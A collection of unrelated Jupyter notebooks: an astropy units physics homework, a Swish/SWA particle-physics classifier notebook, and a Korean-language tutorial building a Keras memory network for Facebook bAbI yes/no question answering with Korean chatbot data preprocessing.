where $\theta$ and $\phi$ are the polar and azimuthal angles in a spherical coordinate system and parameter values are in the table above.
### Tasks
Your task for each domain,
1. Calculate the time evolution of the concentration -- store concentration at time steps to make a movie
2. Plot the free energy as a function of time steps until you judge that convergence or a local equilibrium has been reached.
3. Present wall clock time for the calculations, and wall clock time per core used in the calculation.
|
github_jupyter
|
# First Last - Homework 4
* Use the `Astropy` units and constants packages to solve the following problems.
* Do not hardcode any constants!
* Unless asked, your units should be in the simplest SI units possible
```
import numpy as np
from astropy import units as u
from astropy import constants as const
from astropy.units import imperial
imperial.enable()
```
### Impulse is a change in momentum
$$ I = \Delta\ p\ =\ m\Delta v $$
**Problem 1** - Calculate the $\Delta$v that would be the result of an impuse of 700 (N * s) for M = 338 kg.
**Problem 2** - Calculate the $\Delta$v that would be the result of an impuse of 700 (lbf * s) for M = 338 kg.
This is the unit conversion error that doomed the [Mars Climate Orbiter](https://en.wikipedia.org/wiki/Mars_Climate_Orbiter)
### The range of a projectile launched with a velocity (v) at and angle ($\theta$) is
$$R\ =\ {v^2 \over g}\ sin(2\theta)$$
**Problem 3** - Find R for v = 123 mph and $\theta$ = 1000 arc minutes
**Problem 4** - How fast to you have to throw a football at 33.3 degrees so that is goes exactly 100 yards? Express your answer in mph
### Kepler's third law can be expressed as:
$$ T^2 = \left( {{4\pi^2} \over {GM}} \right)\ r^3 $$
Where **T** is the orbial period of an object at distance (**r**) around a central object of mass (**M**).
It assumes the mass of the orbiting object is small compared to the mass of the central object.
**Problem 5** - Calculate the orbital period of HST. HST orbits 353 miles above the **surface** of the Earth. Expess your answer in minutes.
** Problem 6 ** - An exoplanet orbits the star Epsilon Tauri in 595 days at a distance of 1.93 AU. Calculate the mass of Epsilon Tauri in terms of solar masses.
### The velocity of an object in orbit is
$$ v=\sqrt{GM\over r} $$
Where the object is at a distance (**r**) around a central object of mass (**M**).
**Problem 7** - Calculate the velocity of HST. Expess your answer in km/s and mph.
**Problem 8** - The Procliamer's song [500 miles](https://youtu.be/MJuyn0WAYNI?t=27s) has a duration of 3 minutes and 33 seconds. Calculate at what altitude, above the Earth's surface, you would have to orbit to go 1000 miles in this time. Express your answer in km and miles.
### The Power being received by a solar panel in space can be expressed as:
$$ I\ =\ {{L_{\odot}} \over {4 \pi d^2}}\ \varepsilon$$
Where **I** is the power **per unit area** at a distance (**d**) from the Sun, and $\varepsilon$ is the efficiency of the solar panel.
The solar panels that power spacecraft have an efficiency of about 40%.
** Problem 9 ** - The [New Horizons](http://pluto.jhuapl.edu/) spacecraft requires 220 Watts of power.
Calculate the area of a solar panel that would be needed to power New Horizons at a distance of 1 AU from the Sun.
** Problem 10 ** - Express your answer in units of the area of a piece of US letter sized paper (8.5 in x 11 in).
** Problem 11 ** - Same question as above but now a d = 30 AU.
Express you answer in both sq meters and US letter sized paper
** Problem 12 ** - The main part of the Oort cloud is thought to be at a distance of about 10,000 AU.
Calculate the size of the solar panel New Horizons would need to operate in the Oort cloud.
Express your answer in units of the area of an American football field (120 yd x 53.3 yd).
** Problem 13 ** - Calculate the maximum distance from the Sun where a solar panel of 1 football field can power the New Horizons spacecraft. Express your answer in AU.
### Due Tue Jan 31 - 5pm
- `Make sure to change the filename to your name!`
- `Make sure to change the Title to your name!`
- `File -> Download as -> HTML (.html)`
- `upload your .html and .ipynb file to the class Canvas page`
|
github_jupyter
|
# Swish-based classifier with data augmentation and stochastic weght-averaging
- Swish activation, 4 layers, 100 neurons per layer
- Data is augmentaed via phi rotations, and transvers and longitudinal flips
- Model uses a running average of previous weights
- Validation score use ensemble of 10 models weighted by loss
### Import modules
```
%matplotlib inline
from __future__ import division
import sys
import os
sys.path.append('../')
from Modules.Basics import *
from Modules.Class_Basics import *
```
## Options
```
with open(dirLoc + 'features.pkl', 'rb') as fin:
classTrainFeatures = pickle.load(fin)
nSplits = 10
patience = 50
maxEpochs = 200
ensembleSize = 10
ensembleMode = 'loss'
compileArgs = {'loss':'binary_crossentropy', 'optimizer':'adam'}
trainParams = {'epochs' : 1, 'batch_size' : 256, 'verbose' : 0}
modelParams = {'version':'modelSwish', 'nIn':len(classTrainFeatures), 'compileArgs':compileArgs, 'mode':'classifier'}
print ("\nTraining on", len(classTrainFeatures), "features:", [var for var in classTrainFeatures])
```
## Import data
```
with open(dirLoc + 'inputPipe.pkl', 'rb') as fin:
inputPipe = pickle.load(fin)
trainData = RotationReflectionBatch(classTrainFeatures, h5py.File(dirLoc + 'train.hdf5', "r+"),
inputPipe=inputPipe, augRotMult=16)
```
## Determine LR
```
lrFinder = batchLRFind(trainData, getModel, modelParams, trainParams,
lrBounds=[1e-5,1e-1], trainOnWeights=True, verbose=0)
```
## Train classifier
```
results, histories = batchTrainClassifier(trainData, nSplits, getModel,
{**modelParams, 'compileArgs':{**compileArgs, 'lr':2e-3}},
trainParams, trainOnWeights=True, maxEpochs=maxEpochs,
swaStart=125, swaRenewal=-1,
patience=patience, verbose=1, amsSize=250000)
```
Once SWA is activated at epoch 125, we find that the validation loss goes through a rapid decrease followed by a plateau with large suppression of the statistical fluctuations.
Comparing to 5_Model_Data_Augmentation the metrics are mostly the same, except for the AMS which moves from3.98 to 4.04.
## Construct ensemble
```
with open('train_weights/resultsFile.pkl', 'rb') as fin:
results = pickle.load(fin)
ensemble, weights = assembleEnsemble(results, ensembleSize, ensembleMode, compileArgs)
```
## Response on validation data with TTA
```
valData = RotationReflectionBatch(classTrainFeatures, h5py.File(dirLoc + 'val.hdf5', "r+"), inputPipe=inputPipe,
rotate = True, reflect = True, augRotMult=8)
batchEnsemblePredict(ensemble, weights, valData, ensembleSize=ensembleSize, verbose=1)
print('Testing ROC AUC: unweighted {}, weighted {}'.format(roc_auc_score(getFeature('targets', valData.source), getFeature('pred', valData.source)),
roc_auc_score(getFeature('targets', valData.source), getFeature('pred', valData.source), sample_weight=getFeature('weights', valData.source))))
amsScanSlow(convertToDF(valData.source))
%%time
bootstrapMeanAMS(convertToDF(valData.source), N=512)
```
In the validation metrics we also find improvement over 5_Model_Data_Augmentation: overallAMS moves from 3.97 to 3.99, and AMS corresponding to mean cut increases to 3.97 from 3.91.
# Test scoring
```
testData = RotationReflectionBatch(classTrainFeatures, h5py.File(dirLoc + 'testing.hdf5', "r+"), inputPipe=inputPipe,
rotate = True, reflect = True, augRotMult=8)
%%time
batchEnsemblePredict(ensemble, weights, testData, ensembleSize=ensembleSize, verbose=1)
scoreTestOD(testData.source, 0.9606163307325915)
```
Unfortunately, applying the cut to the test data shows an improvement in the public score (3.65->3.68) but a large decrease in private score (3.82->3.79)
# Save/Load
```
name = "weights/Swish_SWA-125"
saveEnsemble(name, ensemble, weights, compileArgs, overwrite=1)
ensemble, weights, compileArgs, _, _ = loadEnsemble(name)
```
|
github_jupyter
|
# 탐구실험용 toy 코드 (Facebook 바비 Question-Answer)
<p>
# +++++++++++++++++++++++++++++++++++++++++++++
# toy 코드의 한계 및 약점은 ? 약점을 보강할 수 있는 방법 ?
<p>
# 영어와 한글 데이터의 부족을 한영 번역기로 try 하며 탐구
<p>
## +++++++++++++++++++++++++++++++++++++++++++++++++++
<p>
## toy 코드를 통해 약점을 알아내고, 데이터를 조작하며 (좋은 뜻으로 조절),
## 데이터가 어떻게 변형되고, 행렬의 weight와 정확도가 어떻게 변화하는지?
## input 과 중간의 형태, 그리고 최종 output 의 흐름을 스토리텔링하며 탐구 !
# =========== 탐구과제용 :기본적인 문제 =========
# 어떻게 AI 와 수학교육이 융합하여 발전할 수 있을까?
# 영어 데이터를 한글 학습데이터를 번역하고 보강한다.
# 한국어 질문-응답 수학학습 시스템을 만들 수 있을까?
# 무엇보다도, 데이터를 처리하는 방법을 먼저 익히고
# 데이터로 딥러닝하는 알고리즘과 attention 을 탐구하자.
# ==========================================
# Babi 문제 (인터넷에서 babi 문제와 데이터를 찾아본다)
# 교재 130 페이지 참고
## 바비 데이터 github : https://github.com/andri27-ts/bAbI
<p>
# 수학교육 탐구과제로 도전가능한 문제
# QA6 - Yes/No Questions
# QA7 - Counting
### 바비 데이터 : https://github.com/harvardnlp/MemN2N/tree/master/babi_data/en
<p>
# settings ==> .keras ==> dataset 안에 데이터 저장됨
https://appliedmachinelearning.blog/2019/05/01/developing-factoid-question-answering-system-on-babi-facebook-data-set-python-keras-part-1/
# Feature Extraction
Let us first write a helper function to vectorize each stories in order to fetch it to memory network model which we will be creating later.
https://appliedmachinelearning.blog/2019/05/02/building-end-to-end-memory-network-for-question-answering-system-on-babi-facebook-data-set-python-keras-part-2/
# ===================================
# 바비 데이터로 뉴럴네트워크 모델 학습시키기
<p>
# === 자연어처리 : babi QAchatbot 만들기 ===
<p>
# 본래의 Babi QA6 데이터는 data_in 에있다
## ./data_in/babi_qa6_train.txt
## ./data_in/babi_qa6_test.txt
<p>
# =================================
<p>
# toy code 에서는 다음 데이터를 사용한다.
## ./data_in/babi_train_qa.txt
## ./data_in/babi_test_qa.txt
## toy code 의 데이터와 본래 데이터의 차이점은 ??
## +++++++++++++++++++++++++++++++++
<p>
# ========= Toy 바비 QA 탐구===========
```
#Library Imports
import pickle
import numpy as np
import pandas as pd
```
# pickle 데이터 파일과 csv 데이터 파일
## 교재 80페이지의 pandas, numpy 를 익힌다.
```
#retrieve training data
# IOPub data rate exceeded.
# jupyter notebook --NotebookApp.iopub_data_rate_limit=10000000000
unpickled_df = pd.read_pickle('./data_in/babi_train_qa.txt')
# print( unpickled_df)== list 이다
df = pd.DataFrame( unpickled_df )
# df = pd.DataFrame(some_list, columns=["colummn"])
df.to_csv('./data_in/babi_train_qa.csv', index=False)
print( df[0:5] )
df.shape # 학습 데이터의 갯수 일만개 :
#retrieve training data
# IOPub data rate exceeded.
# jupyter notebook --NotebookApp.iopub_data_rate_limit=10000000000
unpickled_df = pd.read_pickle('./data_in/babi_test_qa.txt')
# print( unpickled_df)== list 이다
df = pd.DataFrame( unpickled_df )
# df = pd.DataFrame(some_list, columns=["colummn"])
df.to_csv('./data_in/babi_test_qa.csv', index=False)
print( df[0][0] )
print( df[1][0] )
print( df[2][0] )
print( df[0][4] )
print( df[1][4] )
print( df[2][4] )
print( df[0][5] )
print( df[1][5] )
print( df[2][5] )
print( df.shape ) # ===> 테스트 데이터의 갯수 1000 개
```
# [문제] 아래 QA6 text 파일과 비교하여보라
## ./data_in/babi_qa6_train.txt
## ./data_in/babi_qa6_test.txt
```
with open('./data_in/babi_train_qa.txt', 'rb') as f:
train_data = pickle.load(f)
print( train_data[10] )
train_data[0][0:3]
#retrieve test data
with open('./data_in/babi_test_qa.txt', 'rb') as f:
test_data = pickle.load(f)
#Number of training instances
len(train_data)
#Number of test instances
len(test_data)
#Example of one of the instances
train_data[10]
' '.join(train_data[10][0])
' '.join(train_data[10][1])
train_data[10][2]
```
# ++++++++++++++++++++++++++++++++++++
<p>
# [과제] 한글 챗복 데이터 다루기
<p>
# ++++++++++++++++++++++++++++++++++++
<p>
# [과제 1] data_nmt/conversaiton2.txt 데이터 다루기
```
import pandas as pd
file = open( "./data_nmt/conversation2.txt", "r" , encoding="utf-8")
data = file.readlines()
df1 = []
for ii in data:
df1.append(ii[:-1])
df2 = pd.DataFrame( df1 )
df2.to_csv( './data_nmt/conversation2.csv' , index=False, encoding='utf-8')
datacsv = pd.read_csv( './data_nmt/conversation2.csv' , encoding='utf-8')
datacsv
print( datacsv[0:5] )
result_data=list( )
input_data = list( datacsv['0'][0:5] )
######################################
for seq in input_data :
print( seq )
result = " ".join( okt.morphs(seq.replace(' ', '')))
result_data.append( result )
print( result_data )
datas = []
datas.extend( result_data )
datas
import re
FILTERS = "([~.,!?\"':;)(])"
CHANGE_FILTER = re.compile(FILTERS)
vocabwords = []
for sentence in datas:
# FILTERS = "([~.,!?\"':;)(])"
# 위 필터와 같은 값들을 정규화 표현식을
# 통해서 모두 "" 으로 변환 해주는 부분이다.
sentence = re.sub(CHANGE_FILTER, "", sentence)
for word in sentence.split():
vocabwords.append(word)
print( vocabwords )
import re
DATA_PATH="./data_nmt/conversation2.txt"
############## 챗봇 데이터 ############
def Tokenizer( sentence ):
token=[]
for word in sentence.strip().split():
token.extend(re.compile("([.,!?\"':;)(])").split(word))
ret=[t for t in token if t]
return ret
wordsk=[]
datask=[]
with open( DATA_PATH , 'r' , encoding='utf-8' ) as f:
lines=f.read()
datask.append(lines)
wordsk=Tokenizer( lines )
wordsk=list( set( wordsk ) )
# list <=== datas.shape
print( wordsk[0:10] )
datask[0][0:100]
from konlpy.tag import Okt
okt = Okt()
wordsz=[]
datasz=[]
with open( DATA_PATH , 'r', encoding='utf-8') as content_file :
for con in content_file:
content = content_file.read()
datasz.append( content )
wordsz.extend( okt.morphs(content) )
wordsz = list(set(wordsz))
print( wordsz[0:10] )
datasz[0][0:100]
```
# ++++++++++++++++++++++++++++++++++++
<p>
# [과제 2] data_in/ChatBotData.csv 데이터 다루기
```
import pandas as pd
data = pd.read_csv( './data_in/ChatBotData.csv' , encoding='utf-8')
print( data.head() )
questions, answers = list( data['Q'] ) , list( data['A'] )
from konlpy.tag import Okt # Twitter
from tqdm import tqdm
morph_analyzer = Okt() # Twitter()
# 형태소 토크나이즈 결과 문장을 받을
# 리스트를 생성합니다.
result_data = list()
# 데이터에 있는 매 문장에 대해 토크나이즈를
# 할 수 있도록 반복문을 선언합니다.
# Twitter.morphs 함수를 통해 토크나이즈 된
# 리스트 객체를 받고 다시 공백문자를 기준으로
# 하여 문자열로 재구성 해줍니다.
for seq in tqdm( questions + answers ):
morphlized_seq = " ".join(morph_analyzer.morphs(seq.replace(' ', '')))
result_data.append(morphlized_seq)
questions = result_data
import re
FILTERS = "([~.,!?\"':;)(])"
CHANGE_FILTER = re.compile(FILTERS)
vocabwords = []
for sentence in datas:
# FILTERS = "([~.,!?\"':;)(])"
# 위 필터와 같은 값들을 정규화 표현식을
# 통해서 모두 "" 으로 변환 해주는 부분이다.
sentence = re.sub(CHANGE_FILTER, "", sentence)
for word in sentence.split():
vocabwords.append(word)
print( len(vocabwords) )
vocab = set( vocabwords )
print( len(vocab) )
vocfile = './data_out/vocabularyData.txt'
with open(vocfile , 'w' , encoding='utf-8') as wf:
for w in vocab:
wf.write(w+"\n")
print("단어장이 새로 만들어짐 !!")
```
# ++++++++++++++++++++++++++++++++++++
<p>
# [문제] 한글 단어장을 만드는 과정을 이해하자 !!
# ++++++++++++++++++++++++++++++++++++
<p>
# 챗봇 데이터의 단어장으로 문장을 벡터로 표현 !!
<p>
# ++++++++++++++++++++++++++++++++++++
## 교재 30페이지의 내용과 비교한다
```
set1=[1,2,3,4,5, 1,2,3,9]
set2=[2,3,5,6,7, 2,3,4,8]
set1 = set(set1)
moim = set()
moim = moim.union( set1)
moim = moim.intersection( set(set2))
print( moim )
```
# ./data_in/babi_train_qa.txt 데이터
```
import pickle
with open('./data_in/babi_train_qa.txt', 'rb') as f:
train_data = pickle.load(f)
print( train_data[10] )
train_data[0][0:3]
#First we will build a set of all the words in the dataset:
vocab = set()
for story, question, answer in train_data:
vocab = vocab.union(set(story)) #Set returns unique words in the sentence
#Union returns the unique common elements from a two sets
vocab = vocab.union(set(question))
vocab.add('no')
vocab.add('yes')
for x in vocab :
if( x.startswith('b')) :
print( x )
#Calculate len and add 1 for Keras placeholder - Placeholders are used to feed in the data to the network.
#They need a data type, and have optional shape arguements.
#They will be empty at first, and then the data will get fed into the placeholder
vocab_len = len(vocab) + 1
vocab_len
#retrieve test data
with open('./data_in/babi_test_qa.txt', 'rb') as f:
test_data = pickle.load(f)
#Now we are going to calculate the longest story and the longest question
#We need this for the Keras pad sequences.
#Keras training layers expect all of the input to have the same length, so
#we need to pad
all_data = test_data + train_data
all_story_lens = [len(data[0]) for data in all_data]
max_story_len = (max(all_story_lens))
max_question_len = max([len(data[1]) for data in all_data])
```
# 이제 Babi 데이터의 문장을 벡터로 만들자
First, we will go through a manual process of how to vectorize the data, and then we will create a function that does this automatically for us.
```
import keras
print( keras.__version__ )
from keras.preprocessing.sequence import pad_sequences
from keras.preprocessing.text import Tokenizer
#Create an instance of the tokenizer object:
tokenizer = Tokenizer(filters = [])
tokenizer.fit_on_texts(vocab)
#Dictionary that maps every word in our vocab to an index
# It has been automatically lowercased
#This tokenizer can give different indexes for different words depending on when we run it
tokenizer.word_index
#Tokenize the stories, questions and answers:
train_story_text = []
train_question_text = []
train_answers = []
#Separating each of the elements
for story,question,answer in train_data:
train_story_text.append(story)
train_question_text.append(question)
train_answers.append(answer)
#Coverting the text into the indexes
train_story_seq = tokenizer.texts_to_sequences(train_story_text)
#Create a function for vectorizing the stories, questions and answers:
def vectorize_stories(data,word_index = tokenizer.word_index, max_story_len = max_story_len, max_question_len = max_question_len):
#vectorized stories:
X = []
#vectorized questions:
Xq = []
#vectorized answers:
Y = []
for story, question, answer in data:
#Getting indexes for each word in the story
x = [word_index[word.lower()] for word in story]
#Getting indexes for each word in the story
xq = [word_index[word.lower()] for word in question]
#For the answers
y = np.zeros(len(word_index) + 1) #Index 0 Reserved when padding the sequences
y[word_index[answer]] = 1
X.append(x)
Xq.append(xq)
Y.append(y)
#Now we have to pad these sequences:
return(pad_sequences(X,maxlen=max_story_len), pad_sequences(Xq, maxlen=max_question_len), np.array(Y))
inputs_train, questions_train, answers_train = vectorize_stories(train_data)
inputs_test, questions_test, answers_test = vectorize_stories(test_data)
inputs_train[3]
# train_story_text[3]
train_story_text[0]
# train_story_seq[3]
train_story_seq[0]
train_answers[3]
answers_train[3]
```
# 교재 36페이지의 input-output mapping 참고
# 벡터 대응시키는 모델 (뉴럴네트워크)
```
#Imports
from keras.models import Sequential, Model
from keras.layers.embeddings import Embedding
from keras.layers import Input, Activation, Dense, Permute, Dropout, add, dot, concatenate, LSTM
# We need to create the placeholders
#The Input function is used to create a keras tensor
#PLACEHOLDER shape = (max_story_len,batch_size)
#These are our placeholder for the inputs, ready to recieve batches of the stories and the questions
input_sequence = Input((max_story_len,)) #As we dont know batch size yet
question = Input((max_question_len,))
print( input_sequence )
print( question )
```
# encocder + decoder
## 교재 129 페이지 참고

On the left part of the previous image we can see a representation of a single layer of this model. Two different embeddings are calculated for each sentence, A and C. Also, the query or question q is embedded, using the B embedding.
The A embeddings mi, are then computed using an inner product with the question embedding u (this is the part where the attention is taking place, as by computing the inner product between these embeddings what we are doing is looking for matches of words from the query and the sentence, to then give more importance to these matches using a Softmax function on the resulting terms of the dot product).
Lastly, we compute the output vector o using the embeddings from C (ci), and the weights or probabilities pi obtained from the dot product. With this output vector o, the weight matrix W, and the embedding of the question u, we can finally calculate the predicted answer a hat.
To build the entire network, we just repeat these procedure on the different layers, using the predicted output from one of them as the input for the next one. This is shown on the right part of the previous image.
They have to have the same dimension as the data that will be fed, and can also have a batch size defined, although we can leave it blank if we dont know it at the time of creating the placeholders.
Now we have to create the embeddings mentioned in the paper, A, C and B. An embedding turns an integer number (in this case the index of a word) into a d dimensional vector, where context is taken into account. Word embeddings are widely used in NLP and is one of the techniques that has made the field progress so much in the recent years.
```
#Create input encoder A:
input_encoder_m = Sequential()
input_encoder_m.add(Embedding(input_dim=vocab_len,output_dim = 64)) #From paper
input_encoder_m.add(Dropout(0.3))
#Outputs: (Samples, story_maxlen,embedding_dim) -- Gives a list of the lenght of the samples where each item has the
#lenght of the max story lenght and every word is embedded in the embbeding dimension
#Create input encoder C:
input_encoder_c = Sequential()
input_encoder_c.add(Embedding(input_dim=vocab_len,output_dim = max_question_len)) #From paper
input_encoder_c.add(Dropout(0.3))
#Outputs: (samples, story_maxlen, max_question_len)
#Create question encoder:
#Create input encoder B:
question_encoder = Sequential()
question_encoder.add(Embedding(input_dim=vocab_len,output_dim = 64,input_length=max_question_len)) #From paper
question_encoder.add(Dropout(0.3))
#Outputs: (samples, question_maxlen, embedding_dim)
#Now lets encode the sequences, passing the placeholders into our encoders:
input_encoded_m = input_encoder_m(input_sequence)
input_encoded_c = input_encoder_c(input_sequence)
question_encoded = question_encoder(question)
```
## ++++++++++++++++++++++++
Once we have created the two embeddings for the input sentences, and the embeddings for the questions, we can start defining the operations that take place in our model. As mentioned previously, we compute the attention by doing the dot product between the embedding of the questions and one of the embeddings of the stories, and then doing a softmax. The following block shows how this is done:
```
#Use dot product to compute similarity between input encoded m and question
#Like in the paper:
match = dot([input_encoded_m,question_encoded], axes = (2,2))
match = Activation('softmax')(match)
```
After this, we need to calculate the output o adding the match matrix with the second input vector sequence, and then calculate the response using this output and the encoded question.
```
#For the response we want to add this match with the ouput of input_encoded_c
response = add([match,input_encoded_c])
response = Permute((2,1))(response) #Permute Layer: permutes dimensions of input
#Once we have the response we can concatenate it with the question encoded:
answer = concatenate([response, question_encoded])
answer
```
Lastly, once this is done we add the rest of the layers of the model, adding an LSTM layer (instead of an RNN like in the paper), a dropout layer and a final softmax to compute the output.
```
# Reduce the answer tensor with a RNN (LSTM)
answer = LSTM(32)(answer)
#Regularization with dropout:
answer = Dropout(0.5)(answer)
#Output layer:
answer = Dense(vocab_len)(answer) #Output shape: (Samples, Vocab_size) #Yes or no and all 0s
#Now we need to output a probability distribution for the vocab, using softmax:
answer = Activation('softmax')(answer)
```
# 모델 Model !!
Notice here that the output is a vector of the size of the vocabulary (that is, the length of the number of words known by the model), where all the positions should be zero except the ones at the indexes of ‘yes’ and ‘no’.
```
#Now we build the final model:
model = Model([input_sequence,question], answer)
model.compile(optimizer='rmsprop', loss = 'categorical_crossentropy', metrics = ['accuracy'])
#Categorical instead of binary cross entropy as because of the way we are training
#we could actually see any of the words from the vocab as output
#however, we should only see yes or no
model.summary()
```
With these two lines we build the final model, and compile it, that is, define all the maths that will be going on in the background by specifying an optimiser, a loss function and a metric to optimise.
Now its time to train the model, here we need to define the inputs to the training, (the input stories, questions and answers), the batch size that we will be feeding the model with (that is, how many inputs at once), and the number of epochs that we will train the model for (that is, how many times the model will go through the training data in order to update the weights). I used 1000 epochs and obtained an accuracy of 98%, but even with 100 to 200 epochs you should get some pretty good results.
Note that depending on your hardware, this training might take a while. Just relax, sit back, keep reading Medium and wait until its done.
After its completed the training you might be left wondering “am I going to have to wait this long every time I want to use the model?” the obvious answer my friend is, NO. Keras allows developers to save a certain model it has trained, with the weights and all the configurations. The following block of code shows how this is done.
## +++++++++++++++++++++++++++++
```
print( answers_train.shape )
answers_train[0]
val=model.evaluate( [inputs_train, questions_train], answers_train,
batch_size = 32)
print(val)
# 길이가 38인 곳으로 랜덤하게 가기에, 확률적으로 1/38
#####################################################
my_story = 'Sandra picked up the milk . Mary travelled left . '
my_question = 'Sandra got the milk ?'
my_data = [(my_story.split(), my_question.split(),'yes')]
my_story, my_ques, my_ans = vectorize_stories(my_data)
pred_results = model.predict(([my_story,my_ques]))
val_max = np.argmax(pred_results[0])
print(pred_results[0][val_max])
# 맟출 확률이 1/38
##################
```
# +++++++++++++++++++++++++++++++++
<p>
# 여기의 숫자 ? 확률적으로 !
# 깡통인 모델에 이미 학습한 것을 주입하자
모델 학습과정 설정하기
학습하기 전에 학습에 대한 설정을 수행합니다.
손실 함수 및 최적화 방법을 정의합니다.
케라스에서는 compile() 함수를 사용합니다.
모델 학습시키기
훈련셋을 이용하여 구성한 모델로 학습시킵니다.
케라스에서는 fit() 함수를 사용합니다.
학습과정 살펴보기
모델 학습 시 훈련셋, 검증셋의 손실 및 정확도를 측정합니다.
반복횟수에 따른 손실 및 정확도 추이를 보면서 학습 상황을 판단합니다.
모델 평가하기
준비된 시험셋으로 학습한 모델을 평가합니다.
케라스에서는 evaluate() 함수를 사용합니다.
모델 사용하기
임의의 입력으로 모델의 출력을 얻습니다.
케라스에서는 predict() 함수를 사용합니다.
# 공부한 AI 두뇌 model 을 불러온다.
```
del model
##################################################
#To load a model that we have already trained and saved:
# batch_size=32 , epochs=350 이상 훈련시킨 모델 부름
from keras.models import load_model
# returns a compiled model
# identical to the previous one
##################################################
##################################################
model = load_model('./data_out/babi_chatbot_50.h5')
###################################################
###################################################
```
# ===============================
# 더 공부를 시키자 !!
# 공부한 것을 저장시키자 !!
<p>
## Training and testing the model
## Saving the model +++++++++++
## 학습 평가를 Matplotlib 그래프로 표현
```
"""
import keras.callbacks import EarlyStopping
early_stopping_callback = EarlyStopping( monitor='val_loss', patience=100)
history = model.fit([inputs_train,questions_train],answers_train,
batch_size = 32, epochs = 150,
validation_data = ([inputs_test,questions_test],answers_test),
callbacks=[early_stopping_callback] )
"""
# 위의 코드는 학습데이터 정확도는 up, 테스트 데이터 정확도가 정체된 오버휫팅때 스탑시킴
######################################################################################
history = model.fit([inputs_train,questions_train],answers_train,
batch_size = 32, epochs = 5,
validation_data = ([inputs_test,questions_test],answers_test) )
val=model.evaluate( [inputs_train,questions_train], answers_train,
batch_size = 32)
print(val)
######################################
filename = './data_out/babi_chatbot.h5'
model.save(filename)
# 길이가 38인 곳으로 랜덤하게 가기에, 확률적으로 1/38
########################################
# model.fit 안하면 history 없어서 ==> 에러
# NameError: name 'history' is not defined
#Lets plot the increase of accuracy as we increase the number of training epochs
#We can see that without any training the acc is about 50%, random guessing
import matplotlib.pyplot as plt
%matplotlib inline
print(history.history.keys())
# summarize history for accuracy
plt.figure(figsize=(12,12))
plt.plot(history.history['accuracy'])
plt.plot(history.history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.show()
```
# batch_size = 32 와 epochs=50 의 시작
Train on 10000 samples, validate on 1000 samples
Epoch 1/50
10000/10000 [==============================] - 7s 686us/step - loss: 0.8794 - accuracy: 0.5036 - val_loss: 0.6941 - val_accuracy: 0.5030
Epoch 2/50
10000/10000 [==============================] - 6s 570us/step - loss: 0.7019 - accuracy: 0.4998 - val_loss: 0.6937 - val_accuracy: 0.4970
# batch_size = 64 와 epochs=50 의 끝
Epoch 48/50
10000/10000 [==============================] - 5s 530us/step - loss: 0.3619 - accuracy: 0.8410 - val_loss: 0.4453 - val_accuracy: 0.7980
Epoch 49/50
10000/10000 [==============================] - 5s 542us/step - loss: 0.3586 - accuracy: 0.8406 - val_loss: 0.4490 - val_accuracy: 0.7950
Epoch 50/50
10000/10000 [==============================] - 5s 547us/step - loss: 0.3553 - accuracy: 0.8424 - val_loss: 0.4508 - val_accuracy: 0.8030
=
=
=
=
# batch_size = 32 에 epochs=50 결과

# batch_size = 32 에 epochs=100 결과

## [문제] 학습데이터의 정확도는 높아지는데, 테스트 데이터는 정지됨 !!
### 과적합 over-fitting의 개념을 이해하고, 테스트 데이터 정확도를 높이는 방법을 탐구 !
<p>
### 1. 일만개의 학습데이터와 천개의 테스크 데이터로 나뉘어 있다. 데이터를 일만천개로 바꾸어,
### 돌아가며 k-fold cross validation 하는 방법을 알아보라 (데이터의 양이 적은 경우에 필요)
<p>
### 2. Keras 모델의 한계일 수 있다. Hidden layer 갯수나 딥러닝 알고리즘을 바꾸어 학습을 시킨다,
### 인터넷 등에서 새로운 여러가지 딥러닝 알고리즘을 알아보고, 이를 Babi 에 적용한다.
## 현재의 딥러닝 모델
<pre>
Model: "model_1"
__________________________________________________________________________________________________
Layer (type) Output Shape Param # Connected to
==================================================================================================
input_1 (InputLayer) (None, 156) 0
__________________________________________________________________________________________________
input_2 (InputLayer) (None, 6) 0
__________________________________________________________________________________________________
sequential_1 (Sequential) multiple 2432 input_1[0][0]
__________________________________________________________________________________________________
sequential_3 (Sequential) (None, 6, 64) 2432 input_2[0][0]
__________________________________________________________________________________________________
dot_1 (Dot) (None, 156, 6) 0 sequential_1[1][0]
sequential_3[1][0]
__________________________________________________________________________________________________
activation_1 (Activation) (None, 156, 6) 0 dot_1[0][0]
__________________________________________________________________________________________________
sequential_2 (Sequential) multiple 228 input_1[0][0]
__________________________________________________________________________________________________
add_1 (Add) (None, 156, 6) 0 activation_1[0][0]
sequential_2[1][0]
__________________________________________________________________________________________________
permute_1 (Permute) (None, 6, 156) 0 add_1[0][0]
__________________________________________________________________________________________________
concatenate_1 (Concatenate) (None, 6, 220) 0 permute_1[0][0]
sequential_3[1][0]
__________________________________________________________________________________________________
lstm_1 (LSTM) (None, 32) 32384 concatenate_1[0][0]
__________________________________________________________________________________________________
dropout_4 (Dropout) (None, 32) 0 lstm_1[0][0]
__________________________________________________________________________________________________
dense_1 (Dense) (None, 38) 1254 dropout_4[0][0]
__________________________________________________________________________________________________
activation_2 (Activation) (None, 38) 0 dense_1[0][0]
==================================================================================================
Total params: 38,730
Trainable params: 38,730
Non-trainable params: 0
__________________________________________________________________________________________________
</pre>
## ==========================================
# 학습된 AI 두뇌 모델 evaluate !!!!
# ===================================
```
# model.compile(optimizer='rmsprop', loss = 'categorical_crossentropy', metrics = ['accuracy'])
# print( answers_train.shape ) ==> ( 10000, 38 ) one hot vector
### train 에 대해서 evaluate 한다 //////// test 데이터로 하는 것과 차이 ?? ///////
val=model.evaluate( [inputs_train,questions_train], answers_train, batch_size = 32)
###################################################################################
val
# 50 때 0.88
```
## ==========================================
# 학습된 AI 두뇌 테스트를 위해 문제를 출제 !!!!
# ====================================
```
#Lets check out the predictions on the test set:
#These are just probabilities for every single word on the vocab
# 테스트 데이터 기반의 prediction ##############################
pred_results = model.predict(([inputs_test,questions_test]))
print( pred_results )
```
These results are an array, as mentioned earlier that contain in every position the probabilities of each of the words in the vocabulary being the answer to the question. If we look at the first element of this array, we will see a vector of the size of the vocabulary, where all the times are close to 0 except the ones corresponding to yes or no.
Out of these, if we pick the index of the highest value of the array and then see to which word it corresponds to, we should find out if the answer is affirmative or negative.
One fun thing that we can do now, is create our own stories and questions, and feed them to the bot to see what he says!
```
my_story = 'Sandra picked up the milk . Mary travelled left . '
my_question = 'Sandra got the milk ?'
my_data = [(my_story.split(), my_question.split(),'yes')]
my_story, my_ques, my_ans = vectorize_stories(my_data)
